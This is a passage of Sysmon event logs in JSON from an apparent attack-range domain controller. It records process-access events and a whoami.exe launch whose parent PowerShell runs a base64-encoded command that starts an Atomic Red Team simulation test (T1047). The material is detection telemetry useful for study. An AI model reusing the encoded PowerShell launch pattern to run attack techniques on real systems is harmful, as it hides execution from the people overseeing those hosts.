{41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.143","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5158,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.143\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.143","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5159,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.143\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.143","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5160,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.143\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-00104CF50700}\r\nSourceProcessId: 4536\r\nSourceThreadId: 4616\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-001014350800}\r\nTargetProcessId: 5036\r\nTargetImage: C:\\Windows\\system32\\HOSTNAME.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.143","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-00104CF50700}","SourceProcessId":"4536","SourceThreadId":"4616","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-001014350800}","TargetProcessId":"5036","TargetImage":"C:\\Windows\\system32\\HOSTNAME.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5161,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.152\r\nProcessGuid: {41C8662E-20D1-5F25-0000-001037360800}\r\nProcessId: 3172\r\nImage: C:\\Windows\\System32\\whoami.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: whoami - displays logged on user information\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: whoami.exe\r\nCommandLine: \"C:\\Windows\\system32\\whoami.exe\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CF-5F25-0000-00209EF40700}\r\nLogonId: 0x7F49E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9\r\nParentProcessGuid: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nParentProcessId: 2992\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.152","ProcessGuid":"{41C8662E-20D1-5F25-0000-001037360800}","Image":"C:\\Windows\\System32\\whoami.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"whoami - displays logged on user information","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"whoami.exe","CommandLine":"\"C:\\Windows\\system32\\whoami.exe\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CF-5F25-0000-00209EF40700}","LogonId":"0x7f49e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9","ParentProcessGuid":"{41C8662E-20D0-5F25-0000-0010871B0800}","ParentProcessId":"2992","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5162,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.143\r\nSourceProcessGUID: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nSourceProcessId: 2992\r\nSourceThreadId: 5056\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-001037360800}\r\nTargetProcessId: 3172\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66ed2ee2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e250a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66334823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66392cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663761e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6636816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663746a0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6637423c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e250a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66334823(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.143","SourceProcessGUID":"{41C8662E-20D0-5F25-0000-0010871B0800}","SourceProcessId":"2992","SourceThreadId":"5056","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-001037360800}","TargetProcessId":"3172","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66ed2ee2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e250a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66334823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66392cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663761e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6636816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663746a0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6637423c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e250a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66334823(wow64)","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5163,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.143\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-001037360800}\r\nTargetProcessId: 3172\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.143","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-001037360800}","TargetProcessId":"3172","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
